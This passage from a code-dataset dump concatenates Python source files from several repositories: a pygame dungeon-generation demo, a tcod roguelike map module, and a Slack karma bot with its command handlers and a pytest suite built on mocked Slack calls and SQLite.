return Dungeon.COLORS[self.layer][1]
@property
def layer(self):
try:
return self._layer
except AttributeError:
self._layer = Dungeon.VOIDS
return self._layer
@layer.setter
def layer(self,newLayer):
self._layer = newLayer
@property
def vector(self):
try:
return self._vector
except AttributeError:
self._vector = pygame.math.Vector2(self.rect.center)
return self._vector
@property
def isVoid(self):
return self.layer == Dungeon.VOIDS
@property
def isHall(self):
return self.layer == Dungeon.HALLS
@property
def isMainRoom(self):
return self.layer == Dungeon.MAIN_ROOMS
def centerbox(self,other):
x = min(self.rect.x,other.rect.x)
y = min(self.rect.y,other.rect.y)
w = max(self.rect.x,other.rect.x) - x
h = max(self.rect.y,other.rect.y) - y
return pygame.rect.Rect(x,y,w,h)
def distance_to(self,other):
return self.vector.distance_to(other.vector)
def snapToGrid(self,grid=None):
'''
Aligns the room to the specified grid.
'''
if grid is None:
grid = self.gridSpacing+1
self.rect.x = roundm(self.rect.x,grid)
self.rect.y = roundm(self.rect.y,grid)
def _goodNeighbor(self,other):
if (self == other):
return False
if self.neighbors.count(other) != 0:
return False
return True
def pickClosestNeighbors(self,potentials,limit,reset=False):
'''
potentials: list of Rooms
limit: integer specifying upper limit of rooms to pick as neighbors
reset: clear out neighbors list before finding more neighbors
'''
if reset:
self.neighbors = []
# build a neighborhood dictionary keyed on distance between
# the target room and the potential neighbors. skip rooms
# that aren't good neighbors.
neighborhood = {}
for p in potentials:
if self._goodNeighbor(p):
neighborhood.setdefault(self.distance_to(p),p)
newNeighbors = [neighborhood[d] for d in sorted(neighborhood)][:limit]
self.neighbors.extend(newNeighbors)
return self.neighbors
def update(self,time):
self.move(time)
self.snapToGrid()
def move(self,time):
self.rect.x += self.velocity.x
self.rect.y += self.velocity.y
def repulse(self,other):
dx = (self.rect.x - other.rect.x)
dy = (self.rect.y - other.rect.y)
self.velocity.x += dx + random.randint(-10,10) * random.randint(-1,1)
self.velocity.y += dy + random.randint(-10,10) * random.randint(-1,1)
def render(self,fgcolor=None,bgcolor=None,width=1):
'''
Draw the room with the specified colors and line width.
'''
if fgcolor is None:
fgcolor = self.fgcolor
if bgcolor is None:
bgcolor = self.bgcolor
self.image.fill(bgcolor)
grid = pygame.rect.Rect(0,0,self.gridSpacing+2,self.rect.height)
for grid.x in range(0,self.rect.width,(self.gridSpacing+1)*2):
pygame.draw.rect(self.image,fgcolor,grid,width)
grid = pygame.rect.Rect(0,0,self.rect.width,self.gridSpacing+2)
for grid.y in range(0,self.rect.height,(self.gridSpacing+1)*2):
pygame.draw.rect(self.image,fgcolor,grid,width)
pygame.draw.rect(self.image,fgcolor,grid,width)
class Dungeon(pygame.sprite.RenderUpdates):
# room types
VOIDS = 0
HALLS = 5
MAIN_ROOMS=10
# default room colors by type
COLORS = { VOIDS: ((127,127,127),(0,0,0)), # fg,bg
HALLS: ((255,255,255),(0,0,255)),
MAIN_ROOMS:((255,255,255),(255,0,0))}
@classmethod
def generate(cls,width,height,maxRoomDimension=10,gridSpacing=8,seedRooms=150):
'''
Creates a new dungeon.
'''
dungeon = cls(width,height,
maxRoomDimension,
maxRoomDimension,
gridSpacing)
for x in range(0,seedRooms):
dungeon.addRandomRoom(dungeon.radius/5) # XXX magic number
dungeon.spreadOutRooms()
dungeon.centerIn(pygame.rect.Rect(0,0,dungeon.width,dungeon.height))
for room in dungeon.pickMainRooms(1.25): # XXX magic number
dungeon.setRoomType(room,Dungeon.MAIN_ROOMS)
dungeon.inFillWithVoids()
dungeon.findMainRoomNeighbors()
dungeon.connectHallsToRooms()
return dungeon
def __init__(self,width,height,maxRoomWidth,maxRoomHeight,gridSpacing=8):
'''
width, height : pixels
maxRoomWidth : grid units
maxRoomHeight : grid units
gridSpacing : grid void distance
'''
self.width = width
self.height = height
self.gridSpacing = gridSpacing
self.rooms = pygame.sprite.LayeredUpdates()
self.bgcolor = (80,80,80)
self.maxWidth = maxRoomWidth
self.maxHeight = maxRoomHeight
self.rect = pygame.rect.Rect(0,0,self.width,self.height)
@property
def font(self):
try:
return self._font
except AttributeError:
pygame.sysfont.initsysfonts()
self._font = pygame.sysfont.SysFont(None,14)
return self._font
@property
def bound(self):
rooms = self.rooms.sprites()
if len(rooms):
u = rooms[0].rect.unionall([r.rect for r in rooms[1:]])
else:
u = None
return u
@property
def radius(self):
return min(self.width,self.height) / 2
@property
def mainRooms(self):
return self.rooms.get_sprites_from_layer(self.MAIN_ROOMS)
@property
def halls(self):
return self.rooms.get_sprites_from_layer(self.HALLS)
@property
def voids(self):
return self.rooms.get_sprites_from_layer(self.VOIDS)
def setRoomType(self,room,layer,render=True):
'''
Convenience function for moving sprites between layers.
Assumes room is already a member of self.rooms and not checked.
'''
self.rooms.change_layer(room,layer)
room.layer = layer
if render:
room.render()
def centerIn(self,rect):
dx = rect.center[0] - self.bound.center[0]
dy = rect.center[1] - self.bound.center[1]
for room in self.rooms.sprites():
room.rect.x += dx
room.rect.y += dy
def addRandomRoom(self,radius=None):
'''
Creates a new random room in a circle defined by radius whose origin
is the center of the dungeon.
'''
if radius is None:
radius = self.radius
w = random.randint(1,self.maxWidth)
h = random.randint(1,self.maxHeight)
t = 2.0 * math.pi * random.random()
u = random.random() + random.random()
if u > 1:
r = 2 - u
else:
r = u
x = radius * r * math.cos(t) + self.rect.center[0]
y = radius * r * math.sin(t) + self.rect.center[1]
self.rooms.add(Room(x,y,w,h,self.gridSpacing),layer=self.VOIDS)
def pickMainRooms(self,pickRatio):
'''
Determines the average width and height of all the rooms in the dungeon.
Typically called before inFillWithVoids to avoid skewing the results with
a ton of 1x1 rooms. Rooms who are some pickRatio bigger than average are
picked to be "Main" rooms. Function returns a list of rooms picked.
'''
rooms = self.rooms.sprites()
nrooms = len(rooms)
pick_w = pickRatio * (sum([r.rect.w for r in rooms]) / nrooms)
pick_h = pickRatio * (sum([r.rect.h for r in rooms]) / nrooms)
for room in rooms:
if room.rect.width < pick_w or room.rect.height < pick_h:
self.setRoomType(room,Dungeon.VOIDS)
continue
self.setRoomType(room,Dungeon.MAIN_ROOMS)
return self.mainRooms
def findMainRoomNeighbors(self,maxEdges=2):
'''
Tries to connect rooms by picking their maxEdges nearest neighbors.
Most of the time this results in a connected graph, but sometimes it
doesn't. A full Delaunay triangulation would result in a fully connected
graph.
'''
rooms = self.mainRooms
for room in rooms:
room.pickClosestNeighbors(rooms,maxEdges)
def connectHallsToRooms(self,hallwidth=3):
'''
Once main rooms have found their neighbors, we can turn surrounding void
rooms into hallways with width "hallwidth".
'''
w = gridToScreen(hallwidth,self.gridSpacing)
for room in self.mainRooms:
for neighbor in room.neighbors:
target = room.centerbox(neighbor)
collider = Room.fromRect(target.inflate(w,w),self.gridSpacing)
collider.snapToGrid()
outers = pygame.sprite.spritecollide(collider,self.rooms,False,
collide_with_voids)
collider = Room.fromRect(target.inflate(-w,-w),self.gridSpacing)
collider.snapToGrid()
inners = pygame.sprite.spritecollide(collider,self.rooms,False,
collide_with_voids)
for v in outers:
if v in inners and (v.width == 1) and (v.height == 1):
continue
self.setRoomType(v,Dungeon.HALLS)
v.render()
def inFillWithVoids(self,width=1,height=1,bounds=None):
'''
Fills the bounds rectangle with unit rooms and then collides those
rooms with main rooms and other voids. The unit rooms that collide
are removed and the non-colliders are added to the dungeon.
'''
if bounds is None:
bounds = self.bound
voids = pygame.sprite.Group()
xfin = bounds.x + bounds.width - (self.gridSpacing+1)
yfin = bounds.y + bounds.height - (self.gridSpacing+1)
for x in range(bounds.x,xfin,self.gridSpacing+1):
for y in range(bounds.y,yfin,self.gridSpacing+1):
r = Room(x,y,gridSpacing=self.gridSpacing)
voids.add(r)
pygame.sprite.groupcollide(voids,self.rooms,True,False,collide_rooms)
self.rooms.add(voids,layer=Dungeon.VOIDS)
def stopRooms(self):
'''
Zeros the velocity of all rooms in the dungeon.
'''
for room in self.rooms.sprites():
room.velocity *= 0
room.snapToGrid()
def spreadOutRooms(self,time=0,surface=None):
'''
Collides rooms with a 'collide and scatter' function that will cause
rooms to seperate from one another.
'''
done = False
rooms = self.rooms.sprites()
while not done:
self.rooms.update(time)
done = True
for room in rooms:
room.render()
collisions = pygame.sprite.spritecollide(room,rooms,False,
collide_and_scatter_rooms)
if len(collisions):
if surface:
room.render(bgcolor=(255,0,0))
done = False
break
if surface and not done:
self.draw(surface,True)
return False
self.stopRooms()
return True
def update(self,time):
'''
'''
self.rooms.update(time)
def draw(self,surface,drawBounds=True):
'''
'''
surface.fill(self.bgcolor)
rects = self.rooms.draw(surface)
if drawBounds:
try:
pygame.draw.rect(surface,(0,128,0,0.1),self.bound.inflate(2,2),1)
except:
pass
return rects
if __name__ == '__main__':
from pygame.locals import *
pygame.init()
screen_size = (1024,1024)
screen = pygame.display.set_mode(screen_size,0,32)
pygame.display.set_caption('Dungeon Generation Demo')
dungeon = Dungeon.generate(screen_size[0],screen_size[1])
while True:
dungeon.update(0)
dungeon.draw(screen)
pygame.display.update()
pressed = pygame.key.get_pressed()
if pressed[K_ESCAPE]:
exit()
``` |
{
"source": "JnyJny/hackstar",
"score": 2
} |
#### File: hackstar/hackstar/cli.py
```python
import click
from .engine import TheGame
@click.command()
def cli():
"""
"""
the_game = TheGame()
the_game.run()
```
#### File: hackstar/maps/map.py
```python
import tcod
import random
from loguru import logger
from .tile import Tile
from .rect import Rect
from ..util import random_xy
from ..monsters import random_monster
# from ..items import random_item
class Map:
def __init__(self, width, height, player) -> None:
self.w = width
self.h = height
self.player = player
self.needs_fov_recompute = True
self.dig_dungeon()
self.add_monsters()
@property
def tiles(self):
try:
return self._tiles
except AttributeError:
pass
self._tiles = [[Tile(x, y, True) for y in range(self.h)] for x in range(self.w)]
return self._tiles
@property
def rooms(self) -> list:
"""List of rooms managed by the map. Left over from dig_dungeons.
"""
try:
return self._rooms
except AttributeError:
pass
self._rooms = []
return self._rooms
@property
def entities(self) -> list:
"""List of entities in the map.
"""
try:
return self._entities
except AttributeError:
pass
self._entities = []
return self._entities
def entity_at(self, coords):
"""Searches the entities list for an etity at the given
coordinates in the map. The first matching entity is
returned, otherwise None is returned for no matches.
:param Tuple[int,int] coords:
:return .Entity subclass:
"""
for entity in self.entities:
if entity.position == coords:
return entity
return None
def populate_room(self, room, max_monsters: int) -> list:
"""Adds a random number of monsters up to max_monsters
to the supplied room.
:param .maps.Rect room:
:param int max_monsters:
:return: list of monsters placed
"""
n_monsters = random.randint(0, max_monsters)
# check that the n_monsters <= number of tiles in room
x_range = (room.x + 1, room.x1 - 1)
y_range = (room.y + 1, room.y1 - 1)
monsters = [random_monster() for _ in range(n_monsters)]
for monster in monsters:
logger.debug(f"Monster: {monster!r}")
for monster in monsters:
monster.position = random_xy(x_range, y_range)
while self.entity_at(monster.position):
logger.debug(f"OCCUPADO @ {monster.position}")
monster.position = random_xy(x_range, y_range)
self.entities.append(monster)
logger.debug(f"Placed monster {monster!r}")
return monsters
def add_monsters(self, max_monsters_per_room=3) -> None:
"""
"""
logger.info("Adding monsters to rooms")
for room in self.rooms:
self.populate_room(room, max_monsters_per_room)
def add_loot(self, max_loot_per_room=2) -> None:
"""
"""
logger.info("Adding loot to rooms")
def dig_dungeon(self, max_rooms=11, min_size=6, max_size=10):
"""
"""
min_x, max_x = 0, self.w - 1
min_y, max_y = 0, self.h - 1
for _ in range(max_rooms):
room = Rect.random(min_size, max_size, min_x, max_x, min_y, max_y)
for other_room in self.rooms:
if room in other_room:
break
else:
logger.debug(f"Room: {room}")
self.dig_room(room)
if len(self.rooms) == 0:
self.player.position = room.center
self.entities.append(self.player)
assert len(self.entities) == 1
else:
room_x, room_y = room.center
other_x, other_y = self.rooms[-1].center
if random.randint(0, 1) == 1:
self.dig_h_hall(other_x, room_x, other_y)
self.dig_v_hall(other_y, room_y, room_x)
else:
self.dig_v_hall(other_y, room_y, other_x)
self.dig_h_hall(other_x, room_x, room_y)
self.rooms.append(room)
def dig_room(self, room) -> None:
"""
"""
for x in room.xrange():
for y in room.yrange():
try:
tile = self.tiles[x][y]
tile.blocked = False
tile.opaque = False
except IndexError as err:
logger.debug(f"{err} x={x} y={y}")
def dig_h_hall(self, x0, x1, y):
"""
"""
for x in range(min(x0, x1), max(x0, x1) + 1):
t = self.tiles[x][y]
t.blocked = False
t.opaque = False
def dig_v_hall(self, y0, y1, x):
"""
"""
for y in range(min(y0, y1), max(y0, y1) + 1):
t = self.tiles[x][y]
t.blocked = False
t.opaque = False
def random_rooms(self, count=4):
"""
"""
for _ in range(count):
x = random.randint(1, self.w - 2)
y = random.randint(1, self.h - 2)
w = random.randint(4, 10)
h = random.randint(4, 10)
room = Rect(x, y, w, h)
self.dig_room(room)
def is_blocked(self, x: int, y: int) -> bool:
"""
"""
return self.tiles[x][y].blocked
def is_opaque(self, x: int, y: int) -> bool:
"""
"""
return self.tiles[x][y].opaque
def __iter__(self):
self._x = 0
self._y = 0
return self
def __next__(self):
tile = self.tiles[self._x][self._y]
self._x += 1
if self._x >= self.w:
self._x = 0
self._y += 1
if self._y >= self.h:
raise StopIteration()
return tile
@property
def fov_map(self):
"""tcod.Map
"""
try:
return self._fov_map
except AttributeError:
pass
self._fov_map = tcod.map_new(self.w, self.h)
for tile in self:
tcod.map_set_properties(
self._fov_map, tile.x, tile.y, not tile.opaque, not tile.blocked
)
return self._fov_map
def in_fov(self, x: int, y: int) -> bool:
"""
"""
return tcod.map_is_in_fov(self.fov_map, x, y)
def update(self, radius, light_walls=True, algorithm=0) -> None:
"""
"""
if self.needs_fov_recompute:
logger.debug(
f"Recomputing FOV for {self.player.position} radius {radius} algorithm:{algorithm}"
)
tcod.map_compute_fov(
self.fov_map,
self.player.x,
self.player.y,
radius,
light_walls,
algorithm,
)
def draw(self, console: int, colors: dict, force: bool = False) -> None:
"""
"""
if self.needs_fov_recompute or force:
for tile in self:
visible = tcod.map_is_in_fov(self.fov_map, tile.x, tile.y)
# XXX tile should take more responsibility for what it's color
# is depending on it's configuration.
#
color = 0x000000
if tile.is_wall:
color = colors["light_wall"] if visible else colors["dark_wall"]
if tile.is_floor:
color = colors["light_grnd"] if visible else colors["dark_grnd"]
tcod.console_set_char_background(
console, tile.x, tile.y, color, tcod.BKGND_SET
)
self.needs_fov_recompute = False
for entity in sorted(self.entities, key=lambda x: x.kind.value):
entity.draw(console)
tcod.console_set_default_foreground(console, tcod.white)
tcod.console_print_ex(
console,
1,
self.h - 2,
tcod.BKGND_NONE,
tcod.LEFT,
f"HP: {self.player.hp:02d}/{self.player.max_hp:02d}",
)
```
#### File: hackstar/maps/tile.py
```python
class Tile:
"""
"""
def __init__(self, x, y, blocked: bool, opaque: bool = None):
self.x = x
self.y = y
self.blocked = blocked
if opaque is None:
opaque = blocked
self.opaque = opaque
@property
def is_wall(self):
return self.blocked and self.opaque
@property
def is_floor(self):
return not self.blocked
``` |
{
"source": "JnyJny/karmabot",
"score": 3
} |
#### File: karmabot/commands/add.py
```python
from karmabot import slack
MSG = """Hey {username}, so you want to propose a new command eh?
Awesome! Here are the steps:
1. Karmabot repo: https://github.com/pybites/karmabot
2. Fork the repo, make your branch.
3. Add your command script under the commands/ subdirectory.
4. Open a PR of your branch against PyBites repo.
5. Bob/Julian/Community to approve and merge it in.
Here is a walk-through video:
https://www.youtube.com/watch?v=Yx9qYl6lmzM&t=2s
Thanks!
"""
def add_command(**kwargs):
"""Instructions how to propose a new bot command"""
user_id = kwargs.get("user_id")
if not user_id:
return None
slack_id = slack.format_user_id(user_id)
return MSG.format(username=slack_id)
```
#### File: karmabot/commands/help.py
```python
def create_commands_table(commands):
"""Print this help text"""
ret = "\n".join(
[
"{:<30}: {}".format(name, func.__doc__.strip())
for name, func in sorted(commands.items())
]
)
return "```{}```".format(ret)
```
#### File: karmabot/commands/welcome.py
```python
from random import choice
import karmabot
# thanks Erik!
WELCOME_MSG = """Welcome {user} ++!
Introduce yourself in #general if you like ...
- What do you use Python for?
- What is your day job?
- And: >>> random.choice(pybites_init_questions)
{welcome_question}
Although you will meet some awesome folks here, you can also talk to me :)
Type `help` here to get started ...
Enjoy PyBites Slack and keep calm and code in Python!
@pybob and @julian.sequeira
"""
# some Pythonic welcome questions
WELCOME_QUESTIONS = """How did you use Python for the first time?
What is your favorite Python module?
What was the last Python book you read?
Did you go to Pycon? If so what was the best you got out of it?
Do you have any particular interest or hobby?
How did you hear about PyBites?
What is your favorite software principle of the Zen of Python (import this)
Are you a 100 Days of Code survivor or planning to take the challenge?
What is your favorite TV show, movie or book?
How many Christopher Nolan movies did you see? If > 1 favorite?
If you were to build a chatbot what would it do?
AI, hype or life threatening?
How do you currently use Python?
Are you teaching Python or inspire to do so?
Australia or Spain?
Star Trek or Star Wars?
Tabs or spaces? (be careful!)
Do you use test drive development (TDD)?
What is your favorite editor?
What other programming languages do you know and/or use?"""
def welcome_user(user_id: str) -> str:
"""Welcome a new PyBites community member"""
questions = WELCOME_QUESTIONS.split("\n")
random_question = choice(questions) # noqa: S311
slack_id = karmabot.slack.format_user_id(user_id)
return WELCOME_MSG.format(user=slack_id, welcome_question=random_question)
```
#### File: src/karmabot/karma.py
```python
import logging
from karmabot.db import db_session
from karmabot.db.karma_transaction import KarmaTransaction
from karmabot.db.karma_user import KarmaUser
from karmabot.settings import KARMABOT_ID, MAX_POINTS, SLACK_CLIENT, SLACK_ID_FORMAT
from karmabot.slack import get_available_username, get_channel_name, post_msg
class GetUserInfoException(Exception):
pass
def _parse_karma_change(karma_change):
user_id, voting = karma_change
if SLACK_ID_FORMAT.match(user_id):
receiver = user_id.strip("<>@")
else:
receiver = user_id.strip(" #").lower() # ?
points = voting.count("+") - voting.count("-")
return receiver, points
def process_karma_changes(message, karma_changes):
for karma_change in karma_changes:
receiver_id, points = _parse_karma_change(karma_change)
try:
karma = Karma(
giver_id=message.user_id,
receiver_id=receiver_id,
channel_id=message.channel_id,
)
except GetUserInfoException:
return
try:
text = karma.change_karma(points)
except Exception as exc:
text = str(exc)
post_msg(message.channel_id, text)
class Karma:
def __init__(self, giver_id, receiver_id, channel_id):
self.session = db_session.create_session()
self.giver = self.session.query(KarmaUser).get(giver_id)
self.receiver = self.session.query(KarmaUser).get(receiver_id)
self.channel_id = channel_id
self.last_score_maxed_out = False
if not self.giver:
self.giver = self._create_karma_user(giver_id)
if not self.receiver:
self.receiver = self._create_karma_user(receiver_id)
def _create_karma_user(self, user_id):
user_info = SLACK_CLIENT.api_call("users.info", user=user_id)
error = user_info.get("error")
if error is not None:
logging.info(f"Cannot get user info for {user_id} - error: {error}")
raise GetUserInfoException
slack_id = user_info["user"]["id"]
username = get_available_username(user_info)
new_user = KarmaUser(user_id=slack_id, username=username)
self.session.add(new_user)
self.session.commit()
logging.info(f"Created new KarmaUser: {repr(new_user)}")
return new_user
def _calc_final_score(self, points):
if abs(points) > MAX_POINTS:
self.last_score_maxed_out = True
return MAX_POINTS if points > 0 else -MAX_POINTS
else:
self.last_score_maxed_out = False
return points
def _create_msg_bot_self_karma(self, points) -> str:
if points > 0:
text = (
f"Thanks {self.giver.username} for the extra karma"
f", my karma is {self.receiver.karma_points} now"
)
else:
text = (
f"Not cool {self.giver.username} lowering my karma "
f"to {self.receiver.karma_points}, but you are probably"
f" right, I will work harder next time"
)
return text
def _create_msg(self, points):
receiver_name = self.receiver.username
poses = "'" if receiver_name.endswith("s") else "'s"
action = "increase" if points > 0 else "decrease"
text = (
f"{receiver_name}{poses} karma {action}d to "
f"{self.receiver.karma_points}"
)
if self.last_score_maxed_out:
text += f" (= max {action} of {MAX_POINTS})"
return text
def _save_transaction(self, points):
transaction = KarmaTransaction(
giver_id=self.giver.user_id,
receiver_id=self.receiver.user_id,
channel=get_channel_name(self.channel_id),
karma=points,
)
self.session.add(transaction)
self.session.commit()
finished_transaction = (
self.session.query(KarmaTransaction)
.order_by(KarmaTransaction.id.desc())
.first()
)
logging.info(repr(finished_transaction))
def change_karma(self, points):
""" Updates Karma in the database """
if not isinstance(points, int):
err = (
"Program bug: change_karma should "
"not be called with a non int for "
"points arg!"
)
raise RuntimeError(err)
try:
if self.receiver.user_id == self.giver.user_id:
raise ValueError("Sorry, cannot give karma to self")
points = self._calc_final_score(points)
self.receiver.karma_points += points
self.session.commit()
self._save_transaction(points)
if self.receiver.user_id == KARMABOT_ID:
return self._create_msg_bot_self_karma(points)
else:
return self._create_msg(points)
finally:
logging.info(
(
f"[Karmachange] {self.giver.user_id} to "
f"{self.receiver.user_id}: {points}"
)
)
self.session.close()
```
#### File: karmabot/tests/test_karmabot.py
```python
import os
from datetime import datetime
from unittest.mock import patch
import pytest
from slackclient import SlackClient as RealSlackClient
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
import karmabot.commands.topchannels
from karmabot.commands.joke import _get_closest_category
from karmabot.commands.topchannels import Channel, calc_channel_score
from karmabot.commands.welcome import welcome_user
from karmabot.db import db_session
from karmabot.db.karma_transaction import KarmaTransaction
from karmabot.db.karma_user import KarmaUser
from karmabot.karma import Karma, _parse_karma_change
from karmabot.settings import KARMABOT_ID, SLACK_CLIENT
from karmabot.slack import (
GENERAL_CHANNEL,
format_user_id,
get_available_username,
parse_next_msg,
perform_text_replacements,
)
from tests.slack_testdata import TEST_CHANNEL_HISTORY, TEST_CHANNEL_INFO, TEST_USERINFO
FAKE_NOW = datetime(2017, 8, 23)
@pytest.fixture
def frozen_now(monkeypatch):
class PatchedDatetime(datetime):
@classmethod
def now(cls, **kwargs):
return FAKE_NOW
monkeypatch.setattr(karmabot.commands.topchannels, "dt", PatchedDatetime)
@pytest.fixture(scope="session")
def engine():
return create_engine("sqlite://")
@pytest.fixture(scope="session")
def tables(engine):
KarmaUser.metadata.create_all(engine)
KarmaTransaction.metadata.create_all(engine)
yield
KarmaUser.metadata.drop_all(engine)
KarmaTransaction.metadata.drop_all(engine)
@pytest.fixture
def karma_users():
return [
KarmaUser(user_id="ABC123", username="pybob", karma_points=392),
KarmaUser(user_id="EFG123", username="<NAME>", karma_points=123),
KarmaUser(user_id="XYZ123", username="clamytoe", karma_points=420),
KarmaUser(user_id=KARMABOT_ID, username="karmabot", karma_points=10),
]
@pytest.fixture
def empty_db_session(engine, tables):
"""Returns an SQLAlchemy session, and after the tests
tears down everything properly.
"""
connection = engine.connect()
# begin the nested transaction
transaction = connection.begin()
# use the connection with the already started transaction
session = Session(bind=connection)
yield session
session.close()
# roll back the broader transaction
transaction.rollback()
# put back the connection to the connection pool
connection.close()
@pytest.fixture
def filled_db_session(engine, tables, karma_users):
"""Returns an SQLAlchemy session, and after the tests
tears down everything properly.
"""
connection = engine.connect()
# begin the nested transaction
transaction = connection.begin()
# use the connection with the already started transaction
session = Session(bind=connection)
session.bulk_save_objects(karma_users)
session.commit()
yield session
session.close()
# roll back the broader transaction
transaction.rollback()
# put back the connection to the connection pool
connection.close()
@pytest.fixture
def mock_filled_db_session(monkeypatch, filled_db_session):
def mock_create_session(*args, **kwargs):
return filled_db_session
monkeypatch.setattr(db_session, "create_session", mock_create_session)
@pytest.fixture
def mock_empty_db_session(monkeypatch, empty_db_session):
def mock_create_session(*args, **kwargs):
return empty_db_session
monkeypatch.setattr(db_session, "create_session", mock_create_session)
# Slack API mocks
# TODO: needs to consider multiple messages / types
@pytest.fixture
def mock_slack_rtm_read_msg(monkeypatch):
def mock_rtm_read(*args, **kwargs):
return [{"type": "message", "user": "ABC123", "text": "Hi everybody"}]
monkeypatch.setattr(RealSlackClient, "rtm_read", mock_rtm_read)
@pytest.fixture
def mock_slack_rtm_read_team_join(monkeypatch):
def mock_rtm_read(*args, **kwargs):
return [{"type": "team_join", "user": {"id": "ABC123", "name": "bob"}}]
monkeypatch.setattr(RealSlackClient, "rtm_read", mock_rtm_read)
@pytest.fixture
def mock_slack_api_call(monkeypatch):
def mock_api_call(*args, **kwargs):
call_type = args[1]
if call_type == "users.info":
user_id = kwargs.get("user")
return TEST_USERINFO[user_id]
if call_type == "channels.info":
channel_id = kwargs.get("channel")
return TEST_CHANNEL_INFO[channel_id]
if call_type == "channels.history":
channel_id = kwargs.get("channel")
return TEST_CHANNEL_HISTORY[channel_id]
if call_type == "chat.postMessage":
return None
monkeypatch.setattr(RealSlackClient, "api_call", mock_api_call)
# Testing
def test_slack_team_join(mock_slack_rtm_read_team_join, mock_slack_api_call):
user_id = SLACK_CLIENT.rtm_read()[0].get("user")["id"]
welcome_user(user_id)
actual = parse_next_msg()
assert actual.user_id == KARMABOT_ID
assert actual.channel_id == GENERAL_CHANNEL
assert user_id in actual.text
assert "Introduce yourself in #general if you like" in actual.text
def test_slack_rtm_read(mock_slack_rtm_read_msg):
event = SLACK_CLIENT.rtm_read()
assert event[0]["type"] == "message"
assert event[0]["user"] == "ABC123"
assert event[0]["text"] == "Hi everybody"
# KarmaUser
def test_karma_user_formatted_user_id(karma_users):
assert karma_users[0].formatted_user_id() == "<@ABC123>"
assert karma_users[1].formatted_user_id() == "<@EFG123>"
assert karma_users[2].formatted_user_id() == "<@XYZ123>"
def test_karma_user_repr(karma_users):
assert (
repr(karma_users[0])
== "<KarmaUser> ID: ABC123 | Username: pybob | Karma-Points: 392"
)
@pytest.mark.parametrize(
"test_user_id, expected",
[("ABC123", "pybob"), ("EFG123", "<NAME>"), ("XYZ123", "clamytoe")],
)
def test_lookup_username(mock_filled_db_session, test_user_id, expected):
karma_user = db_session.create_session().query(KarmaUser).get(test_user_id)
assert karma_user.username == expected
def test_create_karma_user(mock_empty_db_session, mock_slack_api_call):
karma = Karma("ABC123", "XYZ123", "CHANNEL42")
assert karma.giver.username == "pybob"
assert karma.receiver.username == "clamytoe"
first = db_session.create_session().query(KarmaUser).get("ABC123")
second = db_session.create_session().query(KarmaUser).get("XYZ123")
assert first.username == "pybob"
assert second.username == "clamytoe"
# Messages / Slack
def test_get_cmd():
pass
def test_perform_bot_cmd():
pass
def test_parse_next_msg():
pass
def test_create_help_msg():
pass
@pytest.mark.parametrize(
"test_text, expected", [("Cheers everybody", "To _cheers_ I say: :beers:")]
)
def test_perform_text_replacements(test_text, expected):
assert perform_text_replacements(test_text) == expected
# Karma
@pytest.mark.parametrize(
"test_change, expected",
[(("<@ABC123>", "+++"), ("ABC123", 3)), (("<@XYZ123>", "----"), ("XYZ123", -4))],
)
def test_parse_karma_change(test_change, expected):
assert _parse_karma_change(test_change) == expected
@pytest.mark.parametrize(
"test_changes",
[
("ABC123", "XYZ123", "CHANNEL42", 2),
("XYZ123", "ABC123", "CHANNEL42", 5),
("EFG123", "ABC123", "CHANNEL42", -3),
],
)
def test_change_karma(mock_filled_db_session, test_changes, mock_slack_api_call):
session = db_session.create_session()
pre_change_karma = session.query(KarmaUser).get(test_changes[1]).karma_points
karma = Karma(test_changes[0], test_changes[1], test_changes[2])
karma.change_karma(test_changes[3])
post_change = session.query(KarmaUser).get(test_changes[1]).karma_points
assert post_change == (pre_change_karma + test_changes[3])
session.close()
def test_change_karma_msg(mock_filled_db_session):
karma = Karma("ABC123", "XYZ123", "CHANNEL42")
assert karma.change_karma(4) == "clamytoe's karma increased to 424"
karma = Karma("EFG123", "ABC123", "CHANNEL42")
assert karma.change_karma(-3) == "pybob's karma decreased to 389"
def test_change_karma_exceptions(mock_filled_db_session):
with pytest.raises(RuntimeError):
karma = Karma("ABC123", "XYZ123", "CHANNEL42")
karma.change_karma("ABC")
with pytest.raises(ValueError):
karma = Karma("ABC123", "ABC123", "CHANNEL42")
karma.change_karma(2)
def test_change_karma_bot_self(mock_filled_db_session):
karma = Karma("ABC123", KARMABOT_ID, "CHANNEL42")
assert (
karma.change_karma(2) == "Thanks pybob for the extra karma, my karma is 12 now"
)
karma = Karma("EFG123", KARMABOT_ID, "CHANNEL42")
assert (
karma.change_karma(3)
== "Thanks <NAME> for the extra karma, my karma is 15 now"
)
karma = Karma("ABC123", KARMABOT_ID, "CHANNEL42")
assert (
karma.change_karma(-3)
== "Not cool pybob lowering my karma to 12, but you are probably right, I will work harder next time"
)
def test_process_karma_changes():
pass
@pytest.mark.parametrize(
"test_user_id, expected", [("ABC123", "<@ABC123>"), ("<@ABC123>", "<@ABC123>")]
)
def test_format_user_id(test_user_id, expected):
assert format_user_id(test_user_id) == expected
@pytest.mark.parametrize(
"test_user_id, expected",
[("ABC123", "pybob"), ("EFG123", "<NAME>"), ("XYZ123", "clamytoe")],
)
def test_get_available_username(mock_slack_api_call, test_user_id, expected):
user_info = SLACK_CLIENT.api_call("users.info", user=test_user_id)
assert get_available_username(user_info) == expected
def _channel_score(channel):
channel_info = channel["channel"]
return calc_channel_score(
Channel(
channel_info["id"],
channel_info["name"],
channel_info["purpose"]["value"],
len(channel_info["members"]),
float(channel_info["latest"]["ts"]),
channel_info["latest"].get("subtype"),
)
)
def test_channel_score(mock_slack_api_call, frozen_now):
most_recent = SLACK_CLIENT.api_call("channels.info", channel="CHANNEL42")
less_recent = SLACK_CLIENT.api_call("channels.info", channel="CHANNEL43")
assert _channel_score(most_recent) > _channel_score(less_recent)
@patch.dict(os.environ, {"SLACK_KARMA_INVITE_USER_TOKEN": "<PASSWORD>..."})
@patch.dict(os.environ, {"SLACK_KARMA_BOTUSER": "U5Z6KGX4L"})
def test_ignore_message_subtypes(mock_slack_api_call, frozen_now):
latest_ignored = SLACK_CLIENT.api_call("channels.info", channel="SOMEJOINS")
all_ignored = SLACK_CLIENT.api_call("channels.info", channel="ONLYJOINS")
assert _channel_score(latest_ignored) > 0
assert _channel_score(all_ignored) == 0
@pytest.mark.parametrize(
"user_category, expected",
[
("all", "all"),
("neutral", "neutral"),
("chuck", "chuck"),
("", "all"),
("al", "all"),
("neutr", "neutral"),
("chuk", "chuck"),
("help", "all"),
],
)
def test_get_closest_category(user_category, expected):
assert _get_closest_category(user_category) == expected
``` |
{
"source": "JnyJny/PyRcon",
"score": 3
} |
